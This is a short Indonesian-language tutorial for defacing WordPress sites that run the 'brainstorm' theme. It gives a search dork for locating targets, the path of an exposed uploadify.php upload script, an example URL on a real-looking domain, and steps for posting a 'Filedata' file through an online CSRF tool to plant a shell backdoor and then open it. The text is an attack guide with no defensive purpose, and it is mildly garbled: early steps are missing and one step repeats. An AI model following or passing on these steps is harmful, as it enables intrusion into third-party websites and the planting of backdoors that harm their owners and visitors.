Tutorial - Cara Deface Poc WP themes Brainstrom Shell Upload
Dork :
inurl:/wp-content/themes/brainstorm/
Exploit :
www.target.com/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php
Tutorial :
Tutorial :
Contoh:
- http://info.nakanosec.com/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php
4.Pergi Ke csrf Online dan Isikan Url tadi, Isi tipe post file dengan Filedata atau Filedata[]
5.Kemudian Pilih shell backdoor milik kalian dan Klik upload
6.Ketika berhasil upload maka web akan menampilkan link seperti berikut
7.Ketika kalian membuka link tersebut maka akan mendapat tampilan shell backdoor kalian
7.Ketika kalian membuka link tersebut maka akan mendapat tampilan shell backdoor kalian